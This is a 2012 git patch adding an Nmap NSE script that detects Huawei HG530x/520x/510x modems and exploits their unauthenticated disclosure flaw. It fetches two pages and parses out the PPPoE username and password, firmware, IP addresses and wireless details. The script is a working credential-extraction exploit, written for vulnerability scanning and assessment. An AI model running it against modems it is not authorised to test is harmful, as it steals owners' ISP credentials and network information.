From cc1ba1ff3deebc76df5f3d15c35f8daea1ad29ec Mon Sep 17 00:00:00 2001
From: paulino <paulino@e0a8ed71-7df4-0310-8962-fdc924857419>
Date: Sun, 27 May 2012 19:18:23 +0000
Subject: [PATCH] Adds http-huawei-hg5xx-vuln. Detects Huawei modems models
 HG530x, HG520x, HG510x and possibly others that are vulnerable to a remote
 credential and information disclosure vulnerability. It also extracts the
 PPPoE credentials and other interesting configuration values.

---
 scripts/http-huawei-hg5xx-vuln.nse | 103 +++++++++++++++++++++++++++++
 scripts/script.db                  |   1 +
 2 files changed, 104 insertions(+)
 create mode 100644 scripts/http-huawei-hg5xx-vuln.nse

diff --git a/scripts/http-huawei-hg5xx-vuln.nse b/scripts/http-huawei-hg5xx-vuln.nse
new file mode 100644
index 000000000..73490c0ff
--- /dev/null
+++ b/scripts/http-huawei-hg5xx-vuln.nse
@@ -0,0 +1,103 @@
+description = [[
+Detects Huawei modems models HG530x, HG520x, HG510x and possibly others that are vulnerable to a remote credential and information disclosure vulnerability. It also extracts the PPPoE credentials 
+and other interesting configuration values. 
+
+Attackers can query the URIs "/Listadeparametros.html" and "/wanfun.js" to extract sensitive information 
+including PPPoE credentials, firmware version, model, gateway, dns servers and active connections among other values.
+
+This vulnerability was discovered and reported by Adiaz from Comunidad Underground de Mexico (http://underground.org.mx).
+]]
+
+---
+-- @usage nmap -p80 --script http-huawei-hg5xx-vuln <target>
+-- @usage nmap -sV http-huawei-hg5xx-vuln <target>
+-- 
+-- @output
+-- PORT   STATE SERVICE VERSION
+-- 80/tcp open  http    Huawei aDSL modem EchoLife HG530 (V100R001B122gTelmex) 4.07 -- UPnP/1.0 (ZyXEL ZyWALL 2)
+-- | http-huawei-hg5xx-vuln: 
+-- |   VULNERABLE:
+-- |   Remote credential and information disclosure in modems Huawei HG5XX
+-- |     State: VULNERABLE (Exploitable)
+-- |     Description:
+-- |       Modems Huawei 530x, 520x and possibly others are vulnerable to remote credential and information disclosure. 
+-- |       Attackers can query the URIs "/Listadeparametros.html" and "/wanfun.js" to extract sensitive information 
+-- |       including PPPoE credentials, firmware version, model, gateway, dns servers and active connections among other values
+-- |     Disclosure date: 2011-01-1
+-- |     Extra information:
+-- |       
+-- |   Model:EchoLife HG530
+-- |   Firmware version:V100R001B122gTelmex
+-- |   External IP:xxx.xxx.xx.xxx
+-- |   Gateway IP:xxx.xx.xxx.xxx
+-- |   DNS 1:200.33.146.249
+-- |   DNS 2:200.33.146.241
+-- |   Network segment:192.168.1.0
+-- |   Active ethernet connections:0
+-- |   Active wireless connections:3
+-- |   BSSID:0xdeadbeefcafe
+-- |   Wireless Encryption (Boolean):1
+-- |   PPPoE username:xxx
+-- |   PPPoE password:xxx
+-- |     References:
+-- |_      http://routerpwn.com/#huawei
+---
+
+author = "Paulino Calderon <calderon () websec mx>"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"exploit","version","vuln"}
+
+local shortport = require "shortport"
+local http = require "http"
+local vulns = require "vulns"
+
+portrule = shortport.http
+
+action = function(host, port)
+  local vuln = {
+       title = 'Remote credential and information disclosure in modems Huawei HG5XX',
+       state = vulns.STATE.NOT_VULN, 
+       description = [[
+Modems Huawei 530x, 520x and possibly others are vulnerable to remote credential and information disclosure. 
+Attackers can query the URIs "/Listadeparametros.html" and "/wanfun.js" to extract sensitive information 
+including PPPoE credentials, firmware version, model, gateway, dns servers and active connections among other values.]],
+       references = {
+           'http://routerpwn.com/#huawei'
+       },
+       dates = {
+           disclosure = {year = '2011', month = '01', day = '1'},
+       },
+     }
+  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+  local open_session = http.get(host.ip, port, "/Listadeparametros.html")
+  if open_session and open_session.status == 200 then
+    vuln.state = vulns.STATE.EXPLOIT
+    local _, _, pppoe_user = string.find(open_session.body, 'Usuario PPPoE:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
+    local _, _, model = string.find(open_session.body, 'Modelo de m\195\179dem:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
+    local _, _, firmware_version = string.find(open_session.body, 'Versi\195\179n de Firmware:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
+    local _, _, gateway = string.find(open_session.body, 'Puerta de Enlace de Internet:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
+    local _, _, ip = string.find(open_session.body, 'IP de Internet del m\195\179dem:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
+    local _, _, dns1 = string.find(open_session.body, 'DNS Primario:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
+    local _, _, dns2 = string.find(open_session.body, 'DNS Secundario:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
+    local _, _, network_segment = string.find(open_session.body, 'Segmento de Red Local:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
+    local _, _, active_ethernet = string.find(open_session.body, 'Conexiones Ethernet Activas:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
+    local _, _, active_wireless = string.find(open_session.body, 'Conexiones Inal\195\161mbricas Activas:</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
+    local _, _, ssid = string.find(open_session.body, 'Nombre de Red Inal\195\161mbrica %(SSID%):</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
+    local _, _, encryption = string.find(open_session.body, 'Encriptaci\195\179n Activada %(0: No, 1:S\195\173%):</td><TD class=tablerowvalue>\n(.-)</td></tr><tr>')
+    local info = string.format("\nModel:%s\nFirmware version:%s\nExternal IP:%s\nGateway IP:%s\nDNS 1:%s\nDNS 2:%s\n"..
+                           "Network segment:%s\nActive ethernet connections:%s\nActive wireless connections:%s\nBSSID:%s\nWireless Encryption (Boolean):%s\nPPPoE username:%s\n",
+                            model, firmware_version, ip, gateway, dns1, dns2, network_segment, active_ethernet, active_wireless, ssid, encryption, pppoe_user)
+
+    local ppp = http.get(host.ip, port, "/wanfun.js")
+    if ppp.status and ppp.status == 200 then
+      local _, _, ppp_pwd = string.find(ppp.body, 'var pwdppp = "(.-)"')
+      info = string.format("%sPPPoE password:%s", info, ppp_pwd)
+    end
+    if firmware_version and model then
+      port.version.product = string.format("Huawei aDSL modem %s (%s)", model, firmware_version)
+      nmap.set_port_version(host, port, "hardmatched")
+    end
+    vuln.extra_info = info
+    return vuln_report:make_output(vuln)
+  end
+end
diff --git a/scripts/script.db b/scripts/script.db
index 8840f22c6..5593e1555 100644
--- a/scripts/script.db
+++ b/scripts/script.db
@@ -144,6 +144,7 @@ Entry { filename = "http-gitweb-projects-enum.nse", categories = { "discovery",
 Entry { filename = "http-google-malware.nse", categories = { "discovery", "external", "malware", "safe", } }
 Entry { filename = "http-grep.nse", categories = { "discovery", "safe", } }
 Entry { filename = "http-headers.nse", categories = { "discovery", "safe", } }
+Entry { filename = "http-huawei-hg5xx-vuln.nse", categories = { "exploit", "version", "vuln", } }
 Entry { filename = "http-icloud-findmyiphone.nse", categories = { "discovery", "safe", } }
 Entry { filename = "http-icloud-sendmsg.nse", categories = { "discovery", "safe", } }
 Entry { filename = "http-iis-webdav-vuln.nse", categories = { "intrusive", "vuln", } }